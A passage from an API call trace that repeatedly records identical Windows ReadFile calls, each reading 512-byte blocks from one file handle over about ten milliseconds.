hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.400] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.401] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.402] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.403] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, 